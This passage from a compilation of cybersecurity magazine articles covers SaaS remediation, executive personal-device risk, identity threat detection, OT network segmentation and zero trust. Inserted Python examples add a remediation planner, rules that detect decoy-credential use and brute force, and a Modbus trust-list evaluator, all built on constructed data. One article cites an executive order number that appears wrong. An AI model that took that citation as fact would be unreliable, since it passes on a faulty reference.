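from datetime import datetime, timedelta
from typing import List, Optional, Tuple

SCORE_THRESHOLD = 40                 # constructed: below this an app counts as low-scored
WARNING_GRACE = timedelta(days=7)    # how long users get to react to the warning email


@dataclass
class SaasApp:
    name: str
    security_score: int
    owner: str
    warning_sent_at: Optional[datetime] = None
    acknowledged: bool = False       # owner replied to the warning (kept app, accepted risk)
    # app-to-app connections: (target app, granted scopes, risk rating)
    connections: List[Tuple[str, str, str]] = field(default_factory=list)


def plan_remediation(apps: List[SaasApp], now: datetime) -> List[Tuple[str, str]]:
    """Evaluate every app against the rules and return (action, subject) pairs.
    The planner is idempotent: re-running it on the same inventory yields the same plan,
    so newly discovered apps and users are covered simply by being in the inventory."""
    actions = []
    for app in apps:
        if app.security_score < SCORE_THRESHOLD:
            if app.warning_sent_at is None:
                actions.append(("warn_owner", app.name))
            elif not app.acknowledged and now - app.warning_sent_at >= WARNING_GRACE:
                actions.append(("disable_app", app.name))
            # warned but still inside the grace period, or risk accepted: no action yet
        for target, scopes, risk in app.connections:
            if risk == "high":
                actions.append(("revoke_connection", f"{app.name}->{target} [{scopes}]"))
    return actions


# Constructed inventory, as a SaaS discovery tool might report it.
NOW = datetime(2022, 6, 1)
INVENTORY = [
    SaasApp("pdf-merge-free", 25, "alice"),                                        # never warned
    SaasApp("legacy-chat", 30, "bob", warning_sent_at=NOW - timedelta(days=10)),  # warning ignored
    SaasApp("notes-plus", 35, "carol", warning_sent_at=NOW - timedelta(days=2)),  # still in grace
    SaasApp("ticketing", 80, "dave",
            connections=[("crm", "read_contacts", "low"), ("mail", "full_mailbox", "high")]),
]


def run_sample() -> List[Tuple[str, str]]:
    return plan_remediation(INVENTORY, NOW)


if __name__ == "__main__":
    for action, subject in run_sample():
        print(f"{action:18} {subject}")
```

Keeping the decision (plan) separate from the execution (actually disabling an app or revoking a grant) lets the security team review the plan before the first run and makes the grace-period logic testable without touching any SaaS API.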
The Need for Automatic Remediation
For security teams, automatic remediation provides a valuable service. Starting with increased visibility
and analysis, a trusted automated remediation solution can address newly identified issues with minimal
human interaction. Not only does it improve accuracy (human error is an ever-present cybersecurity
concern), but it can also free cyber teams to focus on more important tasks.
Automatic remediation aims to provide an additional layer of security. While technology teams should not
see it as an exemption to perform updates and not follow security best practices, the automation process
can reduce some of the overall risks.
Security teams already find themselves pulled thin, juggling long-term planning and investments with
day-to-day needs. Automatic remediation can remove some of that daily burden. This is critical as
organizations continue to see the use of SaaS applications grow.
As companies continue to scale, automatic remediation is not just needed but essential. There are simply
too many applications and security events for manual remediation to be effective, something made even
more difficult with the lack of security professionals in the job market.
A Growing Attack Surface
The use of authorized SaaS applications and unauthorized shadow IT create more avenues for hackers
to gain entry into your larger enterprise. With these doorways, hackers can navigate your network to find
valuable information, such as your company’s financial records, intellectual property, or the personally
identifiable information (PII) of customers and employees.
As this study shows, PII has grown 20-fold in companies that use SaaS applications. Managing this
growing attack surface, which has expanded with increased remote work efforts as employees work on
different networks, presents an enormous challenge. Even the best trained and dedicated security teams
will struggle to keep pace.
SaaS applications have become a critical part of today’s work environment. Too often, though, users
believe these tools are already secure since they come from a big name company or are widely used.
This sense of security often comes at a price.
The Wing Difference
At Wing Security we offer a comprehensive end-to-end SaaS security platform that can help businesses
discover, monitor and remediate potential security issues. This past March, we came out of stealth mode
and are excited to show how our solution can remediate security for more than 100,000 SaaS
applications.
We provide customers with a holistic solution that provides end-to-end coverage. Our platform discovers
all the SaaS solutions used inside a company without having to install agents on users’ devices. Wing
integrates with SaaS applications and then looks for activity and the potential connections between them
and your organization.
Wing also integrates with endpoints. Our platform regularly queries endpoints to gather information about
what SaaS applications employees use on those machines, helping to discover all the SaaS applications
in use and offer security.
The Road Ahead
As your organization grows, ensure that your employees understand the importance of making regular
security updates. Empower your employees to identify and report security vulnerabilities and participate
in cyber defense.
Automating these steps can help reduce some of the burdens on individual users. It also signals that it is
essential when they are requested to take action. Look for SaaS security management tools to automate
as much of this process as possible.
SaaS continues to change the way that the workforce operates. Today’s remote working environment
would not be possible without the thousands of SaaS applications organizations use. There are additional
security components that must be addressed. Technology leaders can use these programs securely,
protect important assets, and empower employees with the right tools in place.
About the Author
Noam Shaar is the CEO and Co-Founder of Wing Security. After
completing a number of leading positions in IDF’s 8200 unit,
retired Brigadier General Noam Shaar took on the role of IDF’s
Chief Information Security Officer, managing the military’s
security end to end. His background provides him with an up
close and personal understanding of the pains and worries of
today’s security leaders. He led large cyber organizations and
operations and is no stranger to the problem at hand. Noam can
be reached online through LinkedIn and at our company website
https://wing.security/
Protect Your Executives’ Personal Digital
Lives to Protect Your Company
By Dr Chris Pierson, BlackCloak Founder & CEO
Earlier this year, news broke that Chinese hackers had been caught sending sophisticated phishing
emails to the personal Gmail accounts of US-government agency employees. While the nation-state
cybercriminals’ exact motivations will never be fully understood, many believe that they were targeting
personal email accounts to circumvent the agency’s robust cybersecurity and gain entry through lateral
movement into the digital infrastructure.
As the lines between the professional and personal have almost completely blurred, this type of lateral
cyberattack is increasingly common; and it poses a major threat to the enterprise. Today, the soft
underbelly of enterprise security has become the personal digital lives - the online privacy, personal
devices, and home networks - of executives, Board Members, and other high-profile employees with
access to finances, proprietary data, and personal information that cybercriminals want to compromise
and place under their control.
Vulnerabilities and minimal security controls entice cybercriminals
It’s not hard to understand why cybercriminals, in particular criminal groups and nation-states, now
choose to attack individuals as the stepping stone into an organization’s digital infrastructure.
For one, most high-profile employees almost always lack the cybersecurity and privacy protections
afforded to them by work when outside of the company’s four walls. In fact, proprietary BlackCloak data
has found that:
• 39% of executives have malware on their personal devices
• 59% of executives have antivirus on their personal devices
• 40% of executives have their IP address available on online data brokers
• 75% of executives’ personal computers are either totally unprotected or operating using default
security settings
Second, the smartest cybercriminals know that CISOs cannot extend enterprise protections into personal
digital lives. Due to ethics risks, privacy laws, SEC requirements, and lack of team bandwidth, among
other factors, security teams cannot simply deploy enterprise protections on personal devices and
networks. Likewise, CISOs maintain zero authority to mandate a spouse or child, or even an executive
for that matter, to follow a protocol or best practice when not in the office. Imagine the look of dismissal
one would receive when telling an executive’s teenager to comply with a rule.
Finally, executives are vulnerable in their personal digital lives because consumer cybersecurity and
privacy protections are no deterrent. Commoditized safeguards, such as signature-based antivirus and
credit card monitoring masquerading as identity theft protection, provide minimal resistance, if any, to
today’s most sophisticated threats.
As such, the path of least resistance into the enterprise is to attack - either by social engineering,
spoofing, malware injection, communications hijacking, or one of many other attack techniques - the
personal digital lives of a company’s most important personnel.
The enterprise as collateral damage
It’s important to note that not all cybercriminals are attacking executives' personal lives exclusively to
move laterally into their organization. Many times, the executives themselves are the target due to their
wealth or status. Nonetheless, an attack on an executive as an individual almost always has some
consequence on the organization.
For example, a CEO of a major autonomous car company is hacked with financial fraud as the objective.
The attack unintentionally exposes private information about the family’s political leanings, which are in
contrast to the mainstream views. While the executive is the victim, the news focuses on the information
leak, and the public backlash to the politics is swift and harsh.
The company then takes a big reputation hit with the public, and many employees are dismayed and
unsure about their future of work. Business continuity is disrupted, and crisis remediation strategies are
forced into action.
In this example, the company wasn’t the primary target (the CEO’s wealth was), but the collateral damage
was plenty impactful.
Reducing risk with digital executive protection
The hit Apple TV show “Severance” in which technology prevents one’s work-life and personal-life from
ever intermingling is a great drama, but it is so far removed from today’s work reality that it's best classified
as science fiction.
Even before the pandemic, the lines between personal and professional life were thinning. Now, with
remote and hybrid work permanent for so many, and with IoT proliferation accelerating at rapid scale, it's
hard for most security teams to be certain about where their perimeter begins and where it actually ends.
That’s why protecting executives in their personal digital lives to protect the company has been a complex
problem to solve. Fortunately, a new wave of digital executive protection solutions make it possible to
take the burden off of the cybersecurity team and put it into the hands of a third-party that can focus
exclusively on mitigating this specific risk factor without the privacy, legal, and bandwidth concerns.
Attacking the personal digital lives of executives may be a threat in its infancy when compared to other
challenges security teams deal with on a daily basis. But it is a threat worth addressing before it gets
completely out of control.
About the Author
Dr. Chris Pierson is the Founder & CEO of BlackCloak, a leader in
digital executive protection for corporate executives, high-profile
and high-net-worth individuals and their families. Chris has been on
the front lines of cybersecurity and privacy in both the public and
private sectors for over 20 years. Previously at the Department of
Homeland Security, Chris served as a special government
employee on their Cybersecurity and Privacy Committees. He’s
also spent time as the Chief Privacy Officer for Royal Bank of
Scotland (RBS), as the Chief Information Security Officer for two
prominent FinTechs, and is also a Distinguished Fellow of the
Ponemon Institute.
Chris can be reached at chris@blackcloak.io, on Twitter
@DrChrisPierson and at our company website www.blackcloak.io.
It’s Time to Rethink Endpoint Security
By Carolyn Crandall, Chief Security Advocate, Attivo Networks
Sometimes, organizations change from within, while other times change is thrust upon them, and fast.
The COVID-19 pandemic is an excellent example of one of those “other times.” It would be difficult to
imagine a situation where change was thrust upon organizations more quickly and unexpectedly than
over the past two years, and that is especially true for their IT infrastructures. The massive shift to remote
work helped save countless enterprises from business disruption, but it came at a cost. Even the most
forward-thinking organizations did not consider widespread remote access when implementing security models.
The massive proliferation of poorly secured endpoint devices, including personal computers and
phones, unsecured modems and routers, and other devices, has put the need for greater endpoint
security in the spotlight. Typically, that has meant turning to endpoint detection and response (EDR)
solutions, but traditional approaches to EDR are no longer enough. Today’s attackers are breaking out
from the endpoint using identity-based attacks, requiring organizations to rethink their approach to
endpoint security. Organizations must complement or upgrade their EDR solutions with identity threat
detection and response (ITDR) tools capable of providing the protection needed to combat today’s
identity-based threats.
Identity-Based Attacks Continue to Increase
Attackers recognize that using identity-based attack methods makes it easy to circumvent traditional
perimeter defenses and directly access corporate networks. And unfortunately, credential theft has
proven to be an easy way for attackers to compromise those identities. The most recent Verizon Data
Breach Investigations Report (DBIR) indicates that credential data is now present in a staggering 61% of
attacks, highlighting the ease with which attackers can access it. Too many organizations leave credential
data exposed on the endpoints, rendering them and the systems they have access to dangerously
vulnerable.
Unfortunately, even with EDR and Identity and Access Management (IAM) systems there remain gaps in
protecting credentials, privileges, and the systems that manage them. They simply aren’t designed to
detect credential-based attacks. What’s more, as the number of identities in use continues to rise,
gaining sufficient visibility into those identities’ permissions isn’t always easy.
of access to identities can be challenging at scale, leading to overprovisioning or granting more access
than is needed to avoid workflow disruptions. On the one hand, this ensures that identities will rarely have
trouble accessing the data they need. On the other hand, an attacker who compromises an identity will
have access to much more data than they otherwise would.
Of course, attackers don’t stop at one compromised identity. Once inside the network, they will move
laterally and attempt to escalate their privileges, conduct reconnaissance, and perform other attack
activities. Most attackers will target Active Directory (AD) to achieve their goals. Since AD serves as the
primary identity service for roughly 90% of Global Fortune 1000 organizations, handling authentication
throughout the enterprise, attackers looking to escalate their attacks consider it a high-value target. If
adversaries can compromise AD, removing them from the network becomes extremely difficult.
Protecting endpoints, and by extension identities, is essential to prevent that from happening.
Rethinking Endpoint Security
The line between endpoints and identities has blurred with the advent of cloud services and the
proliferation of nonhuman identities removing any clear delineation. A virtual machine in the cloud might
be both an endpoint and an identity; after all, it has permissions and entitlements that allow it to access
specific data and areas of the network. This state presents a new opportunity for attackers and forces
defenders to think of endpoint security as they would think of identity security.
Keeping endpoints secure starts with visibility. Organizations need visibility into any exposed identity
assets on endpoints, including orphaned or duplicate credentials, privileged accounts, etc. Defenders
cannot protect identities when they cannot easily see or understand exposures related to user, device,
and domain controller misconfigurations and vulnerabilities. Identifying potential attack paths from the
endpoint to Active Directory and critical servers is also essential. Once they have a good sense of the
exposures and other vulnerabilities endangering the endpoint, the organization can begin the process of
remediation.
Defenders then need to prioritize credential protection. Preventing credential theft is essential in today’s
threat environment, and organizations can take steps like binding their credentials to applications to make
it harder for attackers to steal and use them. Defenders can also be proactive, placing false credentials
on network endpoints to trick attackers into stealing them. When an attacker attempts to use a set of
deceptive credentials, the system can flag it as attacker activity and notify defenders in real time. In
addition to seeding decoy credentials, organizations can also take steps to hide their real credentials,
making them invisible to attackers. Much like defenders cannot protect what they cannot see, attackers
cannot steal what they cannot see. And if they can’t compromise a valid identity, they will find it that much
harder to break out from the endpoint and escalate their attacks.
Bringing Endpoint and Identity Security Together
Organizations are increasingly implementing ITDR solutions to complement EDR tools and provide the
ability to address credential theft, credential misuse, privilege escalation, and other attack activities that
traditional endpoint security solutions are not designed to manage. Together, these solutions can help
defenders identify potential vulnerabilities on the endpoint while adding real-time detection capabilities to
identify suspicious activities like mass account or password changes, brute force attacks, use of disabled
accounts, and more. The ability to conceal valid credentials while seeding fake ones designed to attract
adversaries adds a new layer of defense designed to make it harder for attackers to break out from the
endpoint and reach Active Directory. By rethinking their approach to endpoint security and integrating it
with identity-based solutions, today’s organizations can shore up their defenses against some of today’s
most prevalent, and most evasive, attacks.
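The detections described in the two paragraphs above (use of seeded decoy credentials, use of disabled accounts, brute force, and mass password changes) can be expressed as a few rules over authentication events. The Python below is an added example for this article, not Attivo’s or SentinelOne’s product code; the event format, thresholds, account names and log lines are all constructed for it.

```python
from collections import defaultdict
from datetime import datetime, timedelta
from typing import List, Tuple

# Constructed identity inventory. Decoy accounts are seeded on endpoints and have no
# legitimate use, so any authentication attempt with one is treated as attacker activity.
DECOY_ACCOUNTS = {"svc_backup_legacy"}
DISABLED_ACCOUNTS = {"jdoe_old"}

BRUTE_FORCE_THRESHOLD, BRUTE_FORCE_WINDOW = 5, timedelta(minutes=5)
MASS_CHANGE_THRESHOLD, MASS_CHANGE_WINDOW = 3, timedelta(minutes=10)


def parse_event(line: str) -> dict:
    """Parse one constructed 'timestamp key=value ...' authentication event."""
    ts_text, _, rest = line.partition(" ")
    event = dict(kv.split("=", 1) for kv in rest.split())
    event["ts"] = datetime.strptime(ts_text, "%Y-%m-%dT%H:%M:%SZ")
    return event


def _burst(times: List[datetime], threshold: int, window: timedelta) -> bool:
    """True if at least `threshold` timestamps fall within one sliding `window`."""
    times = sorted(times)
    return any(times[i + threshold - 1] - times[i] <= window
               for i in range(len(times) - threshold + 1))


def detect(lines: List[str]) -> List[Tuple[str, str, str]]:
    """Return (detection, account_or_actor, source) triples for the given events."""
    alerts = []
    failures_by_src = defaultdict(list)   # src -> failed logon timestamps (any account)
    changes_by_actor = defaultdict(list)  # actor -> password change timestamps
    for line in lines:
        ev = parse_event(line)
        user, src = ev["user"], ev["src"]
        if user in DECOY_ACCOUNTS:                       # success or failure: both matter
            alerts.append(("decoy_credential_use", user, src))
        if user in DISABLED_ACCOUNTS and ev["event"] == "logon":
            alerts.append(("disabled_account_use", user, src))
        if ev["event"] == "logon" and ev["result"] == "fail":
            failures_by_src[src].append(ev["ts"])
        if ev["event"] == "password_change":
            changes_by_actor[ev.get("actor", user)].append(ev["ts"])
    for src, times in failures_by_src.items():
        if _burst(times, BRUTE_FORCE_THRESHOLD, BRUTE_FORCE_WINDOW):
            alerts.append(("brute_force", "*", src))
    for actor, times in changes_by_actor.items():
        if _burst(times, MASS_CHANGE_THRESHOLD, MASS_CHANGE_WINDOW):
            alerts.append(("mass_password_change", actor, "-"))
    return alerts


# Constructed sample events: a failed-logon burst, one touch of the decoy account,
# one use of a disabled account, normal activity, and a burst of password resets.
SAMPLE_EVENTS = [
    "2022-04-12T10:00:01Z src=10.0.0.5 user=alice event=logon result=fail",
    "2022-04-12T10:00:12Z src=10.0.0.5 user=alice event=logon result=fail",
    "2022-04-12T10:00:25Z src=10.0.0.5 user=alice event=logon result=fail",
    "2022-04-12T10:00:40Z src=10.0.0.5 user=alice event=logon result=fail",
    "2022-04-12T10:00:58Z src=10.0.0.5 user=alice event=logon result=fail",
    "2022-04-12T10:02:10Z src=10.0.0.5 user=svc_backup_legacy event=logon result=fail",
    "2022-04-12T10:03:00Z src=10.0.0.9 user=jdoe_old event=logon result=fail",
    "2022-04-12T10:15:00Z src=10.0.0.20 user=bob event=logon result=success",
    "2022-04-12T10:16:00Z src=10.0.0.5 actor=admin_tmp user=bob event=password_change result=success",
    "2022-04-12T10:17:00Z src=10.0.0.5 actor=admin_tmp user=carol event=password_change result=success",
    "2022-04-12T10:18:30Z src=10.0.0.5 actor=admin_tmp user=dave event=password_change result=success",
]


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

The decoy rule is the high-signal one: it needs no threshold, because the seeded account has no legitimate user, which is exactly why deception credentials produce fewer false positives than the statistical rules beside them.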
About the Author
Carolyn Crandall is the strategic advisor for SentinelOne, an autonomous
cybersecurity platform company. Prior to SentinelOne, Carolyn served as the
Chief Security Advocate and CMO at Attivo Networks. She is a high-impact
technology executive with over 30 years of experience in building new
markets and successful enterprise infrastructure companies. She has a
demonstrated track record of taking companies from pre-IPO through to
multibillion-dollar sales and held leadership positions at Cisco, Juniper
Networks, Nimble Storage, Riverbed, and Seagate.
Safeguarding Industrial Control Systems
Environments
Preventing internal & external cybersecurity breaches with zero trust OT network segmentation
By Ryan Lung, Senior product manager at TXOne Networks
In recent years, malicious actors have threatened organizations with increasingly higher risks of losses
of money or even of lives. In response, security researchers developed more secure and reliable network
security methodologies. Prior to the invention of the zero trust approach, network defense was typically
based on two separate “trust levels”— inside network and outside network (the internet). Communications
originating from the inner network were considered trustworthy; those from the outer network were not.
As malicious actors have rapidly developed their skills, they have shown clearly that these traditional
methods cannot meet post-digital transformation security needs. This is why the zero trust model insists
that we “never trust, always verify” and even for industrial control system (ICS) networks key ideas
borrowed from it can lead to a much better overall security in OT (operational technology) environments.
OT zero trust cybersecurity provider TXOne Networks shows that these defensive improvements are
more necessary with every passing day.
Increasing OT threat landscape
The terrain of the OT threat landscape is changing with the rhythms of Industry 4.0, industrial IoT, and
digital transformation. Stuxnet was one of the first pieces of malware specifically designed to target an
industrial control system (ICS) and caused the first major OT cyber incident. This kind of attack was
unlikely in an OT environment until 2017, when a worm called WannaCry propagated extremely widely.
In the aftermath many different kinds of malware emerged, and malicious actors began putting serious
work into designing targeted ransomware attacks to exploit specific industry verticals. The greater
productivity promised by modern technologies drives manufacturers to embrace them and to take the
risk of opening the door further to networking and the internet. However, every advancement brings with
it new attack surfaces, and the potential for another, even more aggressive wave of cyberattacks.
Finally, as a decentralized, untraceable digital currency, Bitcoin is the perfect means by which criminals
can collect ransoms without fear of the payment being tracked to reveal their identities. These factors
ensure the continual shifting of the threat landscape. Once attackers have created a new form of malware,
the malware typically gets into an OT environment through insider threats or external cyberattacks.
Insider threats and external attacks
Insider threats can be either unintentional or intentional. In an unintentional case, an employee or
third-party visitor unknowingly brings an infected device onto the premises. An intentional case might
involve a dissatisfied employee or one who has been paid by third parties to conduct sabotage. In both
cases, unsecured USB drives or laptops are the typical devices that carry the threat in.
External cyberattacks often begin in the IT network, most commonly with a phishing attack, and usually
take the form of ransomware or bots. Ransomware encrypts assets and offers them back to
stakeholders at a high price. Bots usually allow attackers to prepare for or set up the rest of the attack,
e.g., by letting them take direct control of systems, execute applications, or collect important
information. Once attackers have compromised the control center network, it is very easy for them to
spread malware and escalate privileges at different levels of the system. Effects can include shutdown
of the entire production cycle, damage to assets, or endangerment of human life.
Network segmentation vs. cyberattacks
Network segmentation has become a common means for organizations to repel modern cyberattacks,
and this practice not only strengthens cybersecurity but also helps to simplify management. As quarantine
for malware is built into the network’s design, if an asset gets infected, only that segment will be affected.
The options for intruders are drastically reduced, and they will be unable to move laterally. For IoT
devices, it allows the data and control paths to be separated, making it more challenging for attackers to
compromise devices. Even if one production line is affected by a cyberattack, the threat will be contained
so that the others can continue to work.
For management, network segmentation makes it easier to monitor traffic between zones and lets
administrators cope with a large number of IoT devices. As new communication technologies are added
to worksite environments, network segmentation will be the first line of defense and the foundation for
keeping risk low.
Building up zero trust OT environments
While the core of zero trust is network segmentation, stakeholders who want to bulletproof their worksite
and keep the operation running should also implement virtual patching, trust lists, hardening of critical
assets, and security inspections.
To support policy management, maintenance, and event log review, the solutions used to implement
these practices should be centralized. In addition, ideal network segmentation solutions for OT and ICS
environments must be OT-native and need to come in different form factors for different purposes. The
two key form factors are OT-native IPSs, for micro-segmentation and 1-to-1 protection of critical assets,
and OT-native firewalls, for transparently creating segmentation with a broader definition of network
security policy. IPSs can also come as an “array,” where many of them are included in one appliance
for ease of management.
In order to create advanced configurations at the command level, these appliances should be able to
support the OT protocols that the work site’s assets use. Micro-segmentation can then be conducted
using trust lists set at the network level, with OT-native IPSs or firewalls enforcing policy at the protocol
level. Support for virtual patching is necessary as well, and critical assets should be hardened using
trust lists deployed within the device, at the level of applications and processes.
Creating trust lists
Firstly, for fixed-use legacy assets, it is as simple as creating a trust list that only allows the applications
and processes necessary to the asset’s purpose to run, which also prevents malware from running.
Secondly, for modernized machines that have more resources and must carry out a variety of tasks,
hardening must be based on trust lists backed by a library of approved ICS applications and certificates,
as well as machine learning. In addition, security inspections of stand-alone or air-gapped systems, as
well as of inbound and outbound devices, prevent insider threats from affecting company operations.
The concept of zero trust has shown OT security intelligence specialists that network trust awareness
is critical to maintaining operational integrity.
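The two preceding sections describe trust lists at three levels: zone-to-zone network rules, protocol-level constraints enforced by an OT-native IPS or firewall (so that the command itself, not just the connection, is checked), and per-asset application trust lists. The following is an added example, not code from the article or from TXOne Networks, that puts all three together in one small policy evaluator. The asset inventory, zone names, host addresses, process names and sample flows are constructed; the Modbus/TCP port (502) and function codes (0x01-0x04 read, 0x05/0x06/0x0F/0x10 write) are the standard values.

```python
from dataclasses import dataclass

# Standard Modbus/TCP function codes: reads vs. writes.
MODBUS_READ_CODES = frozenset({0x01, 0x02, 0x03, 0x04})
MODBUS_WRITE_CODES = frozenset({0x05, 0x06, 0x0F, 0x10})
MODBUS_PORT = 502

# Constructed asset inventory (host -> zone). Unknown hosts are denied.
ZONES = {
    "10.1.5.7": "enterprise",     # corporate IT workstation
    "10.10.1.20": "control",      # HMI
    "10.10.3.2": "engineering",   # engineering workstation
    "10.10.2.5": "cell1",         # PLC on production line 1
    "10.10.4.5": "cell2",         # PLC on production line 2
}


@dataclass(frozen=True)
class Rule:
    """One network-level trust-list entry with its protocol-level constraint."""
    src_zone: str
    dst_zone: str
    dst_port: int
    function_codes: frozenset   # Modbus function codes permitted on this path


# Constructed zone-level trust list. Anything not listed is denied, so the
# two cells cannot talk to each other and enterprise hosts cannot reach PLCs.
TRUST_LIST = (
    Rule("control", "cell1", MODBUS_PORT, MODBUS_READ_CODES),
    Rule("control", "cell2", MODBUS_PORT, MODBUS_READ_CODES),
    Rule("engineering", "cell1", MODBUS_PORT, MODBUS_READ_CODES | MODBUS_WRITE_CODES),
)


@dataclass(frozen=True)
class Flow:
    src: str
    dst: str
    dst_port: int
    function_code: int


def evaluate_flow(flow, zones=ZONES, rules=TRUST_LIST):
    """Return ('allow'|'deny', reason) for a single OT flow."""
    src_zone, dst_zone = zones.get(flow.src), zones.get(flow.dst)
    if src_zone is None or dst_zone is None:
        return "deny", "host not in asset inventory"
    for rule in rules:
        if (rule.src_zone, rule.dst_zone, rule.dst_port) == (src_zone, dst_zone, flow.dst_port):
            if flow.function_code in rule.function_codes:
                return "allow", f"{src_zone}->{dst_zone} fc 0x{flow.function_code:02X} permitted"
            return "deny", f"fc 0x{flow.function_code:02X} not permitted on {src_zone}->{dst_zone}"
    return "deny", f"no trust-list entry for {src_zone}->{dst_zone}:{flow.dst_port}"


# Constructed per-asset process trust list for application-level hardening.
# A fixed-use asset may run only what its purpose requires; default deny.
PROCESS_TRUST_LIST = {
    "10.10.1.20": frozenset({"hmi_runtime.exe", "historian_agent.exe"}),
}


def evaluate_process(host, process, trust=PROCESS_TRUST_LIST):
    """True only if the process is on the asset's trust list."""
    return process in trust.get(host, frozenset())


if __name__ == "__main__":
    sample_flows = [  # constructed traffic records
        Flow("10.10.1.20", "10.10.2.5", 502, 0x03),   # HMI reads PLC: allow
        Flow("10.10.1.20", "10.10.2.5", 502, 0x10),   # HMI writes PLC: deny
        Flow("10.10.3.2", "10.10.2.5", 502, 0x10),    # engineering writes: allow
        Flow("10.1.5.7", "10.10.2.5", 502, 0x03),     # IT host to PLC: deny
        Flow("10.10.2.5", "10.10.4.5", 502, 0x03),    # cell-to-cell: deny
        Flow("10.10.2.99", "10.10.2.5", 502, 0x03),   # unknown host: deny
    ]
    for f in sample_flows:
        print(f.src, "->", f.dst, *evaluate_flow(f))
    print("powershell.exe on HMI allowed?", evaluate_process("10.10.1.20", "powershell.exe"))
```

The point of the protocol-level check is visible in the second and third flows: the HMI and the engineering workstation both open a legitimate Modbus session to the same PLC, but only the engineering zone is trusted to write registers, which an ordinary port-based firewall rule cannot express. Default deny at every layer (unknown host, unlisted zone pair, unlisted process) is what makes the segmentation "zero trust" rather than a blocklist.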
Conclusion
Implementing zero trust in OT and ICS environments is much easier with network segmentation and
therefore network segmentation has become a byword in work site cyberdefense. However, when IT-
based solutions are deployed in operational technology and ICS environments, their large demands on
resources and lack of sensitivity to OT protocols are just as likely to interfere with operations as they are
to protect them. For this reason, TXOne Networks has developed OT-native solutions, supported by the
efforts of threat researchers who constantly monitor the threat landscape. As malicious actors develop
new methods of cyberattack, the best practices of network segmentation, virtual patching, trust lists,
hardening critical assets, and periodic security inspections allow organizations to repel the cyberthreats
of today and prevent the threats of tomorrow.
For more information, visit TXOne Networks.
About the Author
Ryan Lung is a senior product manager at TXOne Networks,
where he manages TXOne Networks’ networking product
management and design teams and is responsible for ICS
network security products. He has worked in network security
product management and design for over 14 years. Ryan Lung
earned an M.S. degree in Information Management from National
United University.
Ryan Lung can be reached online at contact@txone.com
Securing Your Organization During Global
Turmoil
Repelling Cyber Criminals Trying to Capitalize on a Crisis
By Kevin Orr, President, RSA Federal
Current geopolitical crises unfolding around the globe have far-reaching implications. In just a few short
months, we have seen change on a global scale, impacting people, business and society as a whole.
Unfortunately, it is this type of environment in which cyber criminals thrive. As a result, organizations
today must quickly adapt to new market dynamics, evolving partner and customer relationships and
changing business operations during these turbulent times.
In its infancy, the landscape of data security was fairly simple, allowing for an open-door system of
exploration, protected from hackers by firewalls and other relatively standard cybersecurity measures.
However, as personal data became more and more omnipresent in the digital landscape, so too did the
mining and theft of it. Certain aspects of protection did not keep up, leaving personal data and
information more easily accessible for cyber criminals to collect and exploit. Today, the current
geopolitical crisis, combined with the increase in always-on access brought on by trends like remote
work and the potential for everybody to interact with anybody, has created a much more complex
landscape. This complexity has also created opportunities for data to be compromised, creating an
inherent need for enhanced cybersecurity measures to secure the copious amount of data and
information that is disseminated online.
While this complex cybersecurity landscape has created many challenges for businesses and
government organizations alike, we are now seeing for the first time a uniform approach to cybersecurity
being implemented. The current threat landscape also underscored the importance of Executive Order
14208 and other pending legislation aimed at improving cybersecurity posture. Personal data has evolved
not just into a commodity, but a means of leverage or even extortion of certain individuals. Data theft can
mean more than just exposure of sensitive information; it can also seriously impact national security,
companies or individuals whose reputations and ethics are being exploited. And we must not forget about
the fatal impact of extortion as a result of data being held hostage.
All of this indicates an inherent need to update cybersecurity practices toward a zero-trust method,
rather than the traditional trust-but-verify approach. But what does this approach actually look like?
Companies and government agencies often share upwards of thirty percent of their data with third-party
collaborators, an inevitability of working with other agencies in a digital environment. This places the
focal point of data security not on the data itself, but rather on the governance that ensures individuals
gaining access to this information are in fact who they say they are. Legitimate figures have become
increasingly hard to recognize in a digital age, amid sources of misinformation, trojan horses and rapidly
advancing ransomware, and in many cases malicious sources have become nearly indistinguishable in
appearance from reputable ones. Solutions like multi-factor authentication have proven effective across
these areas, but many organizations and government agencies still have ground to cover to meet the
highest security standards through the implementation of advanced identity and access management
capabilities.
The Nirvana of these solutions would center around the narrative of: What is my most critical information?
How is it protected? Who has access to it? And who provides accountability for that access? Individuals
should be able to tier the potential threat level to their data or security, and strategize how to grant access
to other users, without compromising sensitive information, and finally, be able to disrupt access to this
information at their own discretion.
The next definitive phase in cybersecurity solutions will likely be centered around identity proofing and
governance of data access, rather than what specific data is accessible. Rather than focusing on specific
data entitlements for individuals, the solution lies in creating a zero-trust environment with no
exceptions. In other words, instead of continuing the current de-facto practice of “trust but verify” before
setting up protection, the order of operations should be reversed, shifting from a free-rein approach to
more prescriptive access to data and information.
The cybersecurity challenges for organizations and government agencies alike have only grown the past
few months. Now is the time to improve upon cybersecurity posture across the board, taking into account
the proper cybersecurity strategy and solutions built upon the concept of zero-trust. Only then will today’s
organizations properly protect themselves from bad actors that thrive in turbulent times.
About the Author
Kevin Orr is President of RSA Federal, which provides security
solutions to federal agencies including U.S. intelligence, state/local
municipalities and public sector agencies. With over 25 years of
government experience in leading hyper-growth technology
organizations, he has proven leadership in opening new markets,
attracting and retaining world class talent and leading in challenging
environments. Kevin can be reached online at
https://www.linkedin.com/in/kevinmichaelorr/ and at our company
website https://www.rsa.com/.
The Emergence of Dynamic Threat Hunting
A review of the evolving cyber security industry over 15 years in business
By James “Jim” McMurry, CEO / Founder, Milton Security, Inc.
No one can argue that cyber security is the same today as it was fifteen years ago. There have been
numerous trends and companies that we’ve seen come and go over the last decade-and-a-half, but what
is most intriguing is the evolution of the industry and the emergence of Dynamic Threat Hunting (DTH).
We’ll get into the specifics of what exactly Dynamic Threat Hunting is and how it differs from the industry
norms in a bit, but first, it is helpful to provide a backdrop for how we managed to get to this point.
As with all good storytelling, it’s important to have a central metaphor that helps us tie everything together
and better understand the key points. In this case, we’re going to use the classic story of the Trojan
Horse, first because the story is well-known and second because it does an exceptional job helping to
visualize the evolution into Dynamic Threat Hunting that we have been observing and preaching for
years.
Your Trojan War
In Greek mythology, the Trojan War was fought between the Greeks and the people of Troy sometime
in the 13th or 12th century BC. We won’t get into the events leading up to the war, because those are
irrelevant; just know that someone important was kidnapped. Ever seen the movie Taken? Yeah, just
like that. The war raged on for quite some time, with the Greeks trying desperately to find any weakness
in the defenses of the city…until one day, they just gave up.
Let’s assume, for this exercise, that your organization is the city of Troy. No, you didn’t kidnap anyone
and you haven’t wronged anyone, you’ve just been doing your own thing, trying to be successful as a
kingdom. You have been called in to put together a team to defend the city. It’s a vast area with thousands
of inhabitants, all of whom have their own specific tasks and duties to keep the city running smoothly.
